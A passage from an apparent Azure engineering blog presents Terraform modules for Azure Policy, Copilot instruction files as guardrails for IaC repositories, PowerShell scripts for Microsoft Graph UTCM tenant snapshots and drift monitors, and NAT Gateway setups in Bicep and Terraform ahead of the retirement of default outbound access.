| `require-tags` | Configurable (`audit`/`deny`) | All `Indexed` resources | Enforces `environment` + `costCentre` for FinOps | | `allowed-locations` | Configurable (`audit`/`deny`) | All resources | Keeps data in approved regions | | `diagnostics-key-services` | `AuditIfNotExists` | Key Vault + Storage Accounts | Ensures logs reach central Log Analytics | Initiatives: | Initiative | Member policies | Typical scope | |---|---|---| | `platform-baseline` | tags + locations + diagnostics | Platform management group (shared services) | | `landing-zone-baseline` | public IP + tags + locations | Landing Zones management group (workloads) | This gives you day-one essentials aligned to Azure Landing Zone governance without overwhelming the team. ## How the modules work The framework hides `azurerm` complexity behind three focused modules. ### `policy_definition` module Creates `azurerm_policy_definition` from JSON artefacts. ```hcl module "deny_public_ip" { source = "../../modules/policy_definition" name = "deny-public-ip-on-nics" display_name = "Deny public IP on network interfaces" policy_json_path = "${path.module}/../../../policies/definitions/network/deny-public-ip.json" mode = "All" management_group_id = data.azurerm_management_group.platform.id metadata = { category = "Network" version = "1.0.0" owner = "platform-team" } } ``` Key feature: `file()` loads `policyRule` and parameters directly from JSON. No HCL escape pain. Outputs: `id`, `name`, full definition object. ### `policy_initiative` module Groups definitions into reusable `azurerm_policy_set_definition`. ```hcl module "platform_baseline_initiative" { source = "../../modules/policy_initiative" name = "platform-baseline" display_name = "Platform Baseline Policy Initiative" management_group_id = data.azurerm_management_group.platform.id member_definitions = [ { id = module.require_tags.id reference_id = "require-tags" parameters = { effect = "[parameters('taggingEffect')]" } } # ... allowed-locations, diagnostics ] } ``` Key feature: builds `policy_definition_reference` blocks from typed list input. ### `policy_assignment` module Deploys assignments at management group scope with explicit enforcement control. ```hcl module "assign_platform_baseline" { source = "../../modules/policy_assignment" name = "plat-base-np" display_name = "Platform Baseline - Non-Production" scope = data.azurerm_management_group.platform.id definition_id = module.platform_baseline_initiative.id enforce = false # maps to enforcement_mode = "DoNotEnforce" parameters = { allowedLocations = var.allowed_locations taggingEffect = "audit" logAnalyticsWorkspaceId = var.log_analytics_workspace_id } non_compliance_message = "Resource non-compliant with Platform Baseline." } ``` Key feature: `enforce = false` gives safe audit mode. Supports identity when you move to `DeployIfNotExists` patterns. ## Get started in five minutes 1. Clone the repo: ```bash git clone https://github.com/ElliottLW/IaC-Azure-Spring-Clean-2026-Policy cd IaC-Azure-Spring-Clean-2026-Policy ``` 2. Create management groups (if needed): ```bash az account management-group create --name mg-platform --parent az account management-group create --name mg-landing-zones --parent mg-platform ``` 3. Configure nonprod: ```bash cp terraform/env/nonprod/terraform.tfvars.example terraform/env/nonprod/terraform.tfvars # Edit: platform_mg_name, allowed_locations, log_analytics_workspace_id ``` 4. Deploy in audit mode: ```bash cd terraform/env/nonprod terraform init terraform plan -var-file=terraform.tfvars -out=tfplan terraform apply tfplan ``` 5. Review compliance in Azure Portal (**Policy -> Compliance**). Once stable, promote to prod and switch to enforce. For complete setup details, see the repository README. ## Where CI/CD fits (and why it matters) The missing piece in most policy rollouts is deployment discipline. If policy changes are not pushed through CI/CD, portal drift comes back fast. Use your pipeline as the only route to production: 1. **Validate on pull request** - `terraform fmt -check` - `terraform validate` - `terraform plan` for nonprod - Optional policy JSON linting and naming checks 2. **Apply to nonprod automatically** - Merge to `main` triggers nonprod apply - Assignments stay in audit mode (`enforce = false`) - Team reviews compliance results before any deny enforcement 3. **Promote to prod with approval gates** - Manual approval step for production - Re-run plan with prod variables - Apply with tighter effects (`audit` -> `deny`) when ready 4. **Keep rollback simple** - Revert the commit - Re-run pipeline - Terraform returns policy state to the last known good version This model works equally well in **GitHub Actions** and **Azure DevOps**. The key is not the platform, it is enforcing one governed path: PR, review, plan, approve, apply. ## Extend it: your policies, same framework Add a new policy JSON file under `policies/definitions//my-policy.json`: ```json { "policyRule": { "if": { /* your condition */ }, "then": { "effect": "[parameters('effect')]" } }, "parameters": { "effect": { "type": "String", "defaultValue": "audit", "allowedValues": ["audit", "deny"] } } } ``` Then call the module in `terraform/env/nonprod/main.tf`: ```hcl module "my_policy" { source = "../../modules/policy_definition" name = "my-policy" display_name = "My Policy" policy_json_path = "${path.module}/../../../policies/definitions//my-policy.json" management_group_id = data.azurerm_management_group.platform.id } ``` Wire it into an initiative and run `terraform plan`. CI/CD integration is straightforward with GitHub Actions or Azure DevOps once this structure is in place. ## How this scales to enterprise This is production platform-team architecture, not a one-subscription demo: - **GitOps by default**: policy changes flow through PRs and pipelines - **Audit-first safety**: validate impact before deny kicks in - **Composable modules**: add policies without changing module internals - **Layered ownership**: shared definitions, environment-scoped assignments - **Parameterised control**: per-environment effects, locations and logging targets Once this baseline is running, plug it directly into your existing Terraform operating model. Fork it. Deploy it. Ship governance that scales. If you want to go deeper or raise questions, use the issues in the GitHub repo – this is exactly the sort of pattern that gets better as more teams adopt and extend it. *Live validated: Terraform 1.14.3, azurerm 3.117.1, real tenant management groups.* --- # IaC and GitHub Copilot on Rails - URL: https://blog.l-w.tech/blog/2026-02-18-AI-Agents-Guardrails-Azure-IaC - Date: 2026-02-18 - Author: Elliott Leighton-Woodruff - Tags: AI Agents, GitHub Copilot, Azure, IaC, Terraform, Bicep, DevOps How GitHub Copilot agents are reshaping infrastructure delivery—and why guardrails are the difference between automation and chaos. AI agents are no longer a novelty in engineering teams—they are becoming a core part of how we deliver cloud, platform and infrastructure at scale. GitHub's recent moves show that the industry is shifting toward an agent-driven development era where automation is no longer optional but expected. But here is the catch. Agents will amplify whatever engineering culture you currently have, good or bad. The difference between "automated delivery" and "total chaos" is one thing….. guardrails. ## Why you should already be using agents in your business GitHub's direction is crystal clear: AI agents aren't accessories, they're the future of software creation. Agents are first-class citizens in GitHub. GitHub introduced Agent HQ, a unified orchestration layer allowing developers to run any agent, anywhere inside their workflow. This marks a major evolution in how developer tooling is structured. For Azure and IaC teams, this means: - Automated enforcement of resource patterns - Automated PR reviews for IaC consistency - Reproducible scaffolding for Landing Zones - Agents that help maintain compliance in every repo - Faster onboarding and cross-team alignment ## Why "on rails" matters for Copilot in Azure IaC GitHub Copilot's agent and chat modes are incredibly productive for Terraform, Bicep, Pulumi and Azure DevOps pipelines, but without explicit guardrails they can drift into unsafe patterns, over-privileged roles or non-compliant configurations. By treating `.github/copilot-instructions.md` and `.instructions.md` as policy-as-code for AI, you can bake Azure-specific constraints directly into the agent's context so every PR suggestion stays aligned with your security, networking and FinOps standards. For regulated or enterprise Azure environments, this is where OpenGuardrails becomes a natural companion: an open-source guard-agent framework that watches, controls and governs AI agents, protecting against prompt injection, data leakage and misuse. ## Org-wide guardrails: the "global playbook" At the organisation level, GitHub Copilot respects custom instructions that apply across repositories, which the coding agent ingests as part of its environment. For an Azure-centric org, typical org-wide guardrails include: **Identities and RBAC** - Prefer managed identities over service principals, use built-in roles where possible, never hard-code secrets. **Networking and isolation** - Default to private endpoints and minimal public exposure, enforce hub-and-spoke or vWAN patterns, tag subnets and NSGs with environment and owner. **Cost and tagging** - Require cost-centre, environment and owner tags, prefer autoscaling and appropriate SKUs, treat untagged resources as non-compliant. You express these in natural-language bullets in a shared org-wide template, then inject them into each repo via a common `.github/copilot-instructions.md` scaffold, for example using a template repo or automation. For extra assurance in regulated environments, you can run Copilot outputs through OpenGuardrails as a pre-commit or PR check, using its unified safety model and DLP capabilities to catch prompt-injection attempts or accidental leakage of sensitive data. ## Per-repo IaC guardrails with .github/copilot-instructions.md Each repository can define its own `/.github/copilot-instructions.md`, which Copilot reads automatically for every chat and agent session in that project. For an Azure IaC repo, your per-repo instructions might cover: - **Tooling and stack** - Terraform vs Bicep, provider versions, module patterns, state storage. - **Security posture** - Key Vault settings, public access rules, identity choices, diagnostics. - **Compliance and standards** - Naming conventions, tagging rules, required policies and blueprints. Because this file travels with the repo and applies to every contributor, it becomes a living, version-controlled policy for how Copilot should reason about your Azure estate. You can also wire this into your CI/CD pipeline by treating any deviation from these instructions as a policy violation, using tools like OpenGuardrails or custom scanners to flag unsafe patterns before merge. ## Fine-grained per-file / per-path guardrails Beyond the global and repo-level files, GitHub Copilot now supports `.instructions.md` under `/.github/instructions` with YAML frontmatter that specifies applyTo globs. For IaC, you might introduce: - `terraform.instructions.md` for HCL files - `bicep.instructions.md` for Bicep modules - `ci-cd.instructions.md` for pipeline YAML These path-specific instructions stack with the repo-wide file, so Copilot can switch context based on whether it is editing Terraform, Bicep or pipeline definitions. For regulated workloads, you can pair this with OpenGuardrails' API-driven guard model to scan every agent-generated diff for policy violations, data-exposure patterns or manipulation-style prompts. ## Getting started with a practical, reusable instruction file (Azure IaC template) Below is a detailed, reusable `.github/copilot-instructions.md` you can drop into an Azure-focused Terraform or Bicep repo and adapt for your own org. ```markdown # GitHub Copilot Azure IaC – AI Agent Instructions ## Project overview Azure infrastructure defined using Terraform and/or Bicep. The goal is secure, compliant and cost-effective landing zones and workloads, aligned with Azure Policy and platform standards. ## 🚨 Workflow rules (MANDATORY) ### Branch strategy **All infra work must be done on feature branches. Never commit directly to main.** - Feature branches: `feature/` - Example: `feature/add-aks-cluster`, `feature/hub-spoke-networking` - Hotfix branches: `hotfix/` - Example: `hotfix/fix-nsg-rules`, `hotfix/tagging-policy-fail` Command pattern: git checkout -b feature/short-description # Make changes, run plan git push origin feature/short-description # Open PR into main ### Pull requests Every PR must include: - Plain English title - ✅ "Add hub-and-spoke network topology for prod" - ❌ "Update main.tf" - Description with: - What changed - Why it changed - How it is implemented (modules, providers, resources) - How it was tested (terraform plan / what-if, environment) ## 🛡️ Security, compliance and safety ### Always refuse these patterns Do not suggest or accept changes that: - Weaken security controls - Public SSH/RDP from the internet - Public storage accounts or key vaults - Disabling encryption at rest or in transit - Bypass governance - Removing or ignoring Azure Policy - Using disallowed regions or SKUs - Omitting required tags (`env`, `owner`, `costCentre`, `workload`) - Mishandle secrets - Hard-coding secrets or keys - Outputting secrets without `sensitive = true` - Storing secrets in git or plain config - Break platform stability - Removing diagnostics or logging - Changing state backends without a migration plan ### Existing guardrails (do not remove) - Secrets come from Key Vault or managed identities - All resources must include `env`, `owner`, `costCentre`, `workload` tags - Azure Policy and Initiatives are managed as code in this repo - Remote state is stored in secured backends (storage account or Terraform Cloud) ### Unsafe request response template "I cannot implement this change because it violates our security or governance rules (for example public ingress, missing tags or bypassing Azure Policy). I can suggest a compliant alternative that keeps us aligned with our Azure Policy and platform standards instead." ## Architecture and conventions - Use modules for reusable patterns (network, AKS, App Service, data) - Prefer managed identities over service principals - Enable diagnostic settings on critical resources - Use private endpoints and hub-and-spoke or vWAN for networked workloads - Naming example: `rg---` - Mandatory tags: `env`, `owner`, `costCentre`, `workload` ## Development workflow ### Local terraform init terraform fmt terraform validate terraform plan -var-file="env/.tfvars" - Always run plan (or Bicep what-if) before opening a PR - Never apply directly against production from a local machine ### CI/CD - All changes apply via pipelines, not local `apply` - Pipelines must run validate and plan stages before apply - Azure Policy stays enabled in all environments, including dev and test ## Remember - Use feature/hotfix branches for all changes - Keep PRs small, documented and tested - Follow security, tagging and Azure Policy rules - Never hard-code secrets or weaken network controls - Never bypass Azure Policy just to "get it working" ``` You can place this in `/.github/copilot-instructions.md` and then layer in path-specific `.instructions.md` files under `/.github/instructions` for Terraform, Bicep and CI/CD as needed. ## What happens when someone tries something they shouldn't When a developer asks a GitHub Copilot agent to do something that violates security, compliance or your instructions, the behaviour depends on where the guardrails sit in the stack. In most agent-style setups the agent will: - Propose the unsafe change in a PR or diff, but not execute it directly against production - Surface the plan in the UI so you can review, pause or reject it before it lands If you have runtime-level protection, for example via Copilot-style agents with integrated governance, the platform can inspect the planned actions and either: - Block the action before it runs, returning an error or warning - Flag the prompt or plan as suspicious and require manual approval or policy-based override In my own demo project, if I try to introduce a change I have explicitly banned in my instruction set, the agent responds by refusing to apply it and explains which rule I am breaking. It is a simple approach that stops issues before they ever hit git. The best part is that this applies to the auotmated agents too, meaning the agents will police themselves on the work they are doing for you!
![GitHub Copilot guardrails in action - agent refusing unsafe change](https://stlwtechwebimages.blob.core.windows.net/images/2026-02-18-AI-Agents-Guardrails-Azure-IaC/guardrailsscreenshot.png)
Without explicit instructions and policy-aligned controls, the agent will often just do what the user asked, even if it is unsafe, because it is optimised for task completion rather than compliance. ## Aligning agent rules with Azure Policy to speed up development Here is the key insight for Azure-first teams. Your GitHub Copilot agent rules should mirror your Azure Policy rules. When they align: - The agent does not waste time proposing configurations that will be rejected by Azure Policy at release - Developers get fast feedback in the editor or PR instead of waiting for a pipeline to fail on non-compliant resources For example: - If Azure Policy denies public-facing NSGs in production, your `.github/copilot-instructions.md` should say "Never suggest public-facing NSG rules; always route via private endpoints or VPN." - If Azure Policy requires specific tags, your instructions should mandate those tags and treat untagged resources as invalid. By baking Azure Policy constraints into your agent instructions, you reduce pipeline failures at the release stage and shorten feedback loops, so engineers fix policy issues early, in the IDE or PR, rather than during a failed deployment. You can even treat Azure Policy definitions as a source of truth for your Copilot instructions, generating or auto-updating `.github/copilot-instructions.md` from policy descriptions so the two layers stay in sync as your compliance posture evolves. This alignment turns your agent from a "code generator that sometimes breaks policy" into a policy-aware co-pilot that helps you move faster without breaking the platform. ## Running IaC and Copilot on rails Put all of this together and you get a three-layer control plane for AI-driven delivery on Azure: - **Copilot instruction files** that steer agents toward safe, consistent IaC - **OpenGuardrails** as the security layer that watches and governs agent behaviour in real time - **Azure Policy** as the hard platform guardrail that denies non-compliant deployments Once those pieces are in place, you can confidently adopt AI agents. You are not just “using Copilot for IaC” you are running IaC and GitHub Copilot on rails, with your governance model encoded from repo to runtime. --- # Making Tenant Configuration Part of Your IaC Story with UTCM - URL: https://blog.l-w.tech/blog/2026-02-10-Making-Tenant-Configuration-Part-Of-IaC-Story-UTCM - Date: 2026-02-10 - Author: Elliott Leighton-Woodruff - Tags: Azure, IaC, Microsoft Graph, UTCM, Entra, Intune The new Unified Tenant Configuration Management (UTCM) APIs in Microsoft Graph finally give us a native way to treat tenant configuration as code, with snapshots, baselines and drift detection baked in. Most Azure platforms I see today have solid Terraform or Bicep for landing zones, but the tenant itself is still a snowflake built out of tickets, wikis and muscle memory. The new Unified Tenant Configuration Management (UTCM) APIs in Microsoft Graph finally give us a native way to treat tenant configuration as code, with snapshots, baselines and drift detection baked in, with Intune brought along as a useful extra for the wider Microsoft 365 community. Then you look at the tenant. Conditional access policies are configured "just once" during a project. Intune profiles are tweaked during an incident and never quite put back. Security settings driven by screenshots in a Word document rather than a source‑controlled baseline. UTCM exists to move this from "best intentions" to something you can actually measure and enforce. ## Why UTCM matters for infra as code If you already live in Terraform, Bicep and policy as code, UTCM plugs a very specific gap. You get: - **Snapshots** of tenant configuration for supported resources, exposed through `configurationSnapshotJob` in Microsoft Graph. - **Baselines** you can store as JSON alongside your infra code to represent "this is how the tenant should look". - **Monitors** that run every six hours and record configuration drift via `configurationMonitor`, `configurationMonitoringResult` and `configurationDrift`. The goal is simple: the tenant should be as repeatable and observable as your landing zones, not something you hope nobody changed in the portal. ## The GitHub repo: what you get Rather than make you reverse‑engineer the preview docs, I have put the basics into a GitHub repo so you can get hands on quickly. It took me a little while to piece together what was required and how it hung together so benefited from experience and get a little headstart! Repo layout: ``` . ├─ README.md ├─ scripts │ ├─ 00-Setup-CheckPrerequisites.ps1 │ ├─ 01-Setup-RegisterServicePrincipal.ps1 │ ├─ 02-Setup-GrantPermissions.ps1 │ ├─ 10-Connect-GraphUtcm.ps1 │ ├─ 20-Snapshot-New.ps1 │ ├─ 21-Snapshot-Get.ps1 │ ├─ 22-Snapshot-Remove.ps1 │ ├─ 30-Monitor-New.ps1 │ ├─ 31-Monitor-Get.ps1 │ ├─ 32-Monitor-Remove.ps1 │ └─ 40-Teardown-RemoveServicePrincipal.ps1 └─ utcm ├─ SUPPORTED_RESOURCES.md └─ snapshots └─ *.json ``` The intent: - **scripts** handles setup, snapshots and monitors so you do not have to remember the Graph resource shapes. - **utcm/baselines** is where your "golden" JSON lives. - **utcm/snapshots** is for raw output from UTCM, ready to be promoted into a baseline when you are happy with it. - **SUPPORTED_RESOURCES.md** documents exactly what works today so you are not guessing. If the demand is there I will expand this to cover more services and add GitHub Actions so you can drop tenant drift checks straight into your CI pipeline. ## Before you start: prerequisites and limits you should know about UTCM is still in beta, so there are a few guardrails to be aware of. You need: - Appropriate licensing for Entra and Intune in your tenant. - Permission to create service principals and assign app roles, such as `Application.ReadWrite.All` and `AppRoleAssignment.ReadWrite.All`. - The Microsoft Graph PowerShell SDK, using the beta profile because UTCM is currently only exposed on the beta endpoint. Install the modules: ```powershell Install-Module Microsoft.Graph -Scope CurrentUser Install-Module Microsoft.Graph.Applications -Scope CurrentUser Install-Module Microsoft.Graph.Authentication -Scope CurrentUser ``` Then let the scripts check for itself: ```powershell .\scripts\00-Setup-CheckPrerequisites.ps1 ``` That script gives you a quick yes or no on modules and highlights any obvious permission gaps before you start creating service principals. The APIs also come with hard limits: - Snapshots are capped at 20,000 resources per tenant per month, retained for seven days, and you can only see up to 12 snapshot jobs at once. - Monitors are capped at 30 per tenant and can monitor up to 800 resources per day across all monitors, on a fixed six‑hour schedule. Those numbers shape how the scripts and examples are designed. ## Step‑by‑step: from zero to your first snapshot I've made the scripts super easy to use, follow them in order and you'll be exporting/downloading in no time. ### 1. Register the UTCM service principal UTCM has its own service principal in your tenant with a fixed appId for Unified Tenant Configuration Management. Run: ```powershell .\scripts\01-Setup-RegisterServicePrincipal.ps1 ``` This script: - Connects to Graph. - Checks whether the UTCM service principal already exists. - Creates it if needed and prints the object id so you can confirm in Entra. You only need to run this once per tenant. ### 2. Give UTCM the Graph permissions it needs The service principal now needs Graph app roles so it can read and, optionally, modify configuration. Do that by running: ```powershell .\scripts\02-Setup-GrantPermissions.ps1 ``` By default this assigns a recommended set of app roles for the Entra and Intune resource types I have validated. You can also give it a minimal set instead: ```powershell .\scripts\02-Setup-GrantPermissions.ps1 -Permissions @( 'User.Read.All', 'Group.Read.All' ) ``` The script: - Finds the Microsoft Graph service principal. - Looks up the app roles by value. - Assigns them to UTCM if they are not already present. For real environments I would start with read‑only where possible and introduce write permissions only when you are confident. ### 3. Connect to Graph with the right scope For day‑to‑day use your pipelines will authenticate to Graph with a workload identity, but for an initial run an interactive login is fine. Run: ```powershell .\scripts\10-Connect-GraphUtcm.ps1 ``` This script: - Switches you into the beta profile. - Connects with the configuration monitoring scope used by UTCM. - Prints the current context so you know exactly which account is active. ### 4. Take Entra and Intune snapshots UTCM does not work with vague workload names. You always talk in terms of concrete resource types such as `microsoft.entra.group` or `microsoft.intune.deviceconfigurationpolicywindows10`. The snapshot script wraps the snapshot APIs for you. For Entra: ```powershell # All validated Entra resource types from the repo .\scripts\20-Snapshot-New.ps1 -Workload entra -WaitForCompletion ``` For Intune (for those of you looking at device and endpoint configuration in the wider tenant story): ```powershell # All validated Intune resource types from the repo .\scripts\20-Snapshot-New.ps1 -Workload intune -WaitForCompletion ``` Or you can be explicit: ```powershell .\scripts\20-Snapshot-New.ps1 -Resources @( 'microsoft.entra.group', 'microsoft.entra.user', 'microsoft.entra.conditionalaccesspolicy' ) -DisplayName "Entra Baseline" -WaitForCompletion ``` The script handles the async job, waits for completion if you ask it to and writes the JSON to `utcm\snapshots`. It also enforces some of the API rules for you: - One workload per snapshot, no mixing Entra and Intune in a single job. - Display names are alphanumeric plus spaces only, to match the API constraints. At this point you have a machine‑readable snapshot of tenant configuration instead of relying on a wiki page. If you want to check status run: ```powershell .\scripts\21-Snapshot-Get.ps1 -ListAll ``` ![Snapshot Get Script Output](https://stlwtechwebimages.blob.core.windows.net/images/2026-02-10-Making-Tenant-Configuration-Part-Of-IaC-Story-UTCM/21-Snapshot-Get.ps1.png) ## From snapshot to baseline and drift detection Once you have snapshots, the next step is to turn them into baselines and drift monitors. ### Promote snapshots to baselines Start by reviewing the JSON in `utcm\snapshots`. Decide which snapshot represents the baseline you want and move or copy it into `utcm\baselines\tenant-baseline.json`. From there you: - Treat it like any other bit of IaC: changes go through pull requests and reviews. - Align it with your landing zone repo structure so teams know where to find "the truth" for tenant configuration. ### Create a monitor for something that matters Monitors are where UTCM starts to feel like policy as code for the tenant. A monitor definition is a list of resources with the properties you care about and the values they must have. UTCM then evaluates those every six hours and records drift when it spots differences. A simple example for a security group: ```powershell $resources = @( @{ displayName = "Critical Security Group" resourceType = "microsoft.entra.group" properties = @{ Id = "group-id-from-snapshot" DisplayName = "Global-Administrators" MailNickname = "global-administrators" MailEnabled = $false SecurityEnabled = $true Ensure = "Present" } } ) .\scripts\30-Monitor-New.ps1 -DisplayName "Entra Security Monitor" ` -BaselineDisplayName "Entra Baseline" ` -Resources $resources ``` The important bit here is that the properties block should match the schema and casing from a real snapshot, you should not just invent property names. You can then manage monitors and drift like this: ```powershell # List monitors .\scripts\31-Monitor-Get.ps1 -ListMonitors # Inspect a specific monitor and its results .\scripts\31-Monitor-Get.ps1 -MonitorId "guid-from-list" # List active configuration drifts .\scripts\31-Monitor-Get.ps1 -ListDrifts ``` ![Monitor Get Script Output](https://stlwtechwebimages.blob.core.windows.net/images/2026-02-10-Making-Tenant-Configuration-Part-Of-IaC-Story-UTCM/31-Monitor-Get.ps1.png) Monitors are limited in number and in the volume of resources they can evaluate each day, and they run on a fixed cadence. So you get most value by focusing on high‑risk areas first: privileged groups, critical Intune profiles, key tenant security policies. If you need to delete monitors or snapshots, the 22 and 32 scripts handle that for you with sensible prompts. ## Cleanup and teardown When you are finished testing or need to reset your UTCM setup, the repo includes cleanup scripts to remove snapshots, monitors and the service principal itself. ### Remove individual or bulk snapshots Delete specific snapshot jobs or clean up failed attempts: ```powershell # Delete a specific snapshot by ID .\scripts\22-Snapshot-Remove.ps1 -SnapshotId "guid" # Delete all failed snapshots .\scripts\22-Snapshot-Remove.ps1 -DeleteFailed # Delete all snapshots (requires confirmation) .\scripts\22-Snapshot-Remove.ps1 -DeleteAll ``` ![Snapshot Remove Script Output](https://stlwtechwebimages.blob.core.windows.net/images/2026-02-10-Making-Tenant-Configuration-Part-Of-IaC-Story-UTCM/22-Snapshot-Remove.ps1.png) Given the 12 visible snapshot job limit and the seven-day retention, regular cleanup becomes part of normal housekeeping rather than an afterthought. ### Remove monitors Delete monitors when you no longer need them or want to restructure your drift detection: ```powershell # Delete a specific monitor by ID .\scripts\32-Monitor-Remove.ps1 -MonitorId "guid" # Delete all monitors (requires confirmation) .\scripts\32-Monitor-Remove.ps1 -DeleteAll ``` ### Complete teardown of UTCM If you need to fully remove UTCM from your tenant, the teardown script handles both the app role assignments and the service principal: ```powershell # Interactive removal with confirmation .\scripts\40-Teardown-RemoveServicePrincipal.ps1 # Force removal without prompts .\scripts\40-Teardown-RemoveServicePrincipal.ps1 -Force ``` This script: - Revokes all Graph app role assignments from the UTCM service principal. - Deletes the UTCM service principal object from your tenant. - Leaves no UTCM configuration behind. This is useful for non-production tenants where you want a clean slate, or when you need to reset permissions during testing. ## Where this fits in a broader platform The interesting bit for me is not running a one‑off snapshot, it is how UTCM fits alongside the rest of your platform story. - Azure infra continues to live in Bicep and Terraform. - Azure Policy and RBAC stay in policy as code. - Tenant configuration now has its own first‑class path into IaC via UTCM, with baselines in Git and drift surfaced automatically instead of discovered during an audit. Today the repo focuses on Entra as the core of the tenant story and Intune as a useful extension for those of you managing endpoints as part of the same platform. If the demand is there I will extend this to more workloads and add GitHub Actions so you can drop tenant drift checks into your pull request flows next to terraform plan and Bicep what if. If you try UTCM and hit interesting edge cases, or if there is a specific part of the tenant you would like to see covered next, I am keen to hear about it. ## Resources If you want to dig deeper into the UTCM APIs and supported resource types: - [Overview of unified tenant configuration management APIs](https://learn.microsoft.com/en-us/graph/unified-tenant-configuration-management-overview) - [Set up authentication for UTCM](https://learn.microsoft.com/en-us/graph/utcm-setup-authentication) - [Supported Entra resources](https://learn.microsoft.com/en-us/graph/utcm-entra-resources) - [UTCM API reference](https://learn.microsoft.com/en-us/graph/api/resources/configurationsnapshotjob)

💻 Get the Code

UTCM PowerShell scripts and examples for treating tenant configuration as code

GitHub Repository
--- # Azure Default Outbound Access Retirement — What's Actually Going On and How You Fix It - URL: https://blog.l-w.tech/blog/2026-02-02-Azure-Default-Outbound-Access-Retirement - Date: 2026-02-03 - Author: Elliott Leighton-Woodruff - Tags: Azure, Networking, IaC, Terraform, Bicep Azure is retiring default outbound access on 31 March 2026 — here's what that means, who it affects, and how to fix it properly with NAT Gateway using Bicep and Terraform. Azure is finally retiring default outbound access, the "invisible" outbound internet connectivity you get when you deploy a VM or similar resource without explicitly configuring egress. The retirement date has been pushed to 31 March 2026, which is Microsoft's polite way of saying: *"These workloads are going to break, and we know most of you haven't fixed it yet."* Importantly, this change applies to newly created VMs. Existing VMs deployed before 31 March 2026 will continue to use the hidden outbound SNAT path unless you remove or override it, though Microsoft recommends transitioning them to explicit outbound methods. If you've worked with Azure long enough, you'll know this behaviour has always been a bit… Azure-ish. Packets appear to leave your environment, you've no idea how, and you only find out it was using default outbound access when it suddenly stops working. So let's walk through what's actually happening, who this affects, and how to fix it using a sane, IaC‑first approach. ## 🧨 What's changing? For years, Azure has quietly injected outbound connectivity into certain resources. You don't configure it, you don't pay for it directly, it's just there. And because it's invisible, a surprising number of production workloads rely on it. Azure currently provides a hidden outbound SNAT path for VMs that don't have NAT Gateway, Load Balancer outbound rules, or any other explicit configuration. This is the "default outbound access" being retired. **This behaviour is going away.** Once it's retired, newly deployed VMs that rely on that "magic" will simply not have outbound internet access. So if any of your VMs or scale sets do things like: - pull packages during boot - fetch scripts or configs from a public URL - reach SaaS APIs - talk to container or package registries - do literally anything involving outbound traffic …they're in scope. ## 🔍 Why it matters Default outbound access has always been a bad idea: - It hides how traffic actually leaves your environment - It breaks any serious attempt at zero‑trust - It makes audits unnecessarily painful - It makes IaC non‑deterministic (your code doesn't describe reality) - It's almost impossible to replicate reliably between environments From Microsoft's point of view, removing it is sensible and long overdue. From your point of view, it's another layer of "surprise networking" that has to be untangled before a date on a PowerPoint slide becomes a date on a post‑incident review. ## 💥 What's going to break The fun part is a lot of teams won't know they rely on this until something goes bang. Typical casualties: - Provisioning scripts that curl or wget external URLs as part of the build - Package updates inside VM builds or configuration tools - cloud-init, Custom Script Extension, DSC and similar bootstrap logic - Legacy services that quietly call random internet endpoints - Control plane communication for older or home‑grown cluster setups - Lift‑and‑shift apps where the original architect has long since vanished If you've ever had a VM mysteriously reach the internet "even though there's no Public IP"… that was default outbound access. You just didn't know it. ## 🛠️ The fix: declare outbound access like a responsible adult Azure now expects you to say, in code, *"this is how my stuff gets to the internet."* That's entirely reasonable. You've essentially got three patterns: - **NAT Gateway** – the default, sensible option for most environments - **Azure Firewall** – when security/governance needs more control and inspection - **Public IP per resource** – for small edge cases, not something to scale Let's dig into NAT Gateway properly, with both Bicep and Terraform. ## ✔️ 1. NAT Gateway For a lot of organisations, a NAT Gateway could be good enough. - Stable outbound IP (or IPs) - Scales properly - Doesn't mess with internal routing - Fits neatly into landing zones - Easy to drop into Bicep or Terraform modules It also gives you a predictable, documentable outbound IP range you can give to vendors, security tools, and that one legacy SaaS product that still lives off IP allow‑lists. ### 🔧 NAT Gateway with Bicep ```bicep @description('Public IP for outbound NAT') resource publicIp 'Microsoft.Network/publicIPAddresses@2023-04-01' = { name: 'nat-gw-pip' location: resourceGroup().location sku: { name: 'Standard' } properties: { publicIPAllocationMethod: 'Static' } } @description('NAT Gateway providing outbound connectivity') resource natGw 'Microsoft.Network/natGateways@2023-04-01' = { name: 'my-nat-gateway' location: resourceGroup().location sku: { name: 'Standard' } properties: { publicIpAddresses: [ { id: publicIp.id } ] } } @description('Virtual network with a subnet using the NAT Gateway for egress') resource vnet 'Microsoft.Network/virtualNetworks@2023-04-01' = { name: 'my-vnet' location: resourceGroup().location properties: { addressSpace: { addressPrefixes: [ '10.0.0.0/16' ] } subnets: [ { name: 'app-subnet' properties: { addressPrefix: '10.0.1.0/24' natGateway: { id: natGw.id } } } ] } } ``` This is the pattern you'd typically wrap into a reusable network/landing-zone module, not paste into every environment, but it gets the idea across. ### 🔧 NAT Gateway with Terraform And the same idea in Terraform: ```hcl resource "azurerm_resource_group" "rg" { name = "rg-nat-example" location = "westeurope" } resource "azurerm_public_ip" "nat_pip" { name = "nat-gw-pip" location = azurerm_resource_group.rg.location resource_group_name = azurerm_resource_group.rg.name allocation_method = "Static" sku = "Standard" } resource "azurerm_nat_gateway" "nat_gw" { name = "my-nat-gateway" location = azurerm_resource_group.rg.location resource_group_name = azurerm_resource_group.rg.name sku_name = "Standard" } resource "azurerm_nat_gateway_public_ip_association" "nat_assoc" { nat_gateway_id = azurerm_nat_gateway.nat_gw.id public_ip_address_id = azurerm_public_ip.nat_pip.id } resource "azurerm_virtual_network" "vnet" { name = "my-vnet" location = azurerm_resource_group.rg.location resource_group_name = azurerm_resource_group.rg.name address_space = ["10.0.0.0/16"] } resource "azurerm_subnet" "app_subnet" { name = "app-subnet" resource_group_name = azurerm_resource_group.rg.name virtual_network_name = azurerm_virtual_network.vnet.name address_prefixes = ["10.0.1.0/24"] nat_gateway_id = azurerm_nat_gateway.nat_gw.id } ``` Again, in reality, you'd tuck this into a network or landing_zone module and parameterise it, but this makes it obvious what's going on: - one or more public IPs - one NAT Gateway - one or more subnets wired to that gateway Anything in those subnets now has explicit, predictable outbound access. ## 🔐 2. Azure Firewall If your security team wants: - TLS inspection - Threat intelligence‑based filtering - FQDN rules and app rules - Centralised logging and analytics …then Azure Firewall is usually the right answer. The pattern there is: - Spoke VNets → route tables → Azure Firewall - Optionally, VWAN for automatic route management and secured VNets - Firewall logging to Log Analytics / SIEM This is more involved (and more expensive), but for regulated workloads and centralised governance it's often non‑negotiable. ## ⚠️ 3. Public IP per resource (let's not…) Yes, you can stick a Public IP on every VM and call it a day. No, you probably shouldn't. It's fine for edge scenarios, appliances, jump boxes, or that one vendor product that refuses to work behind anything sane. It's not a strategy you roll out to an estate of 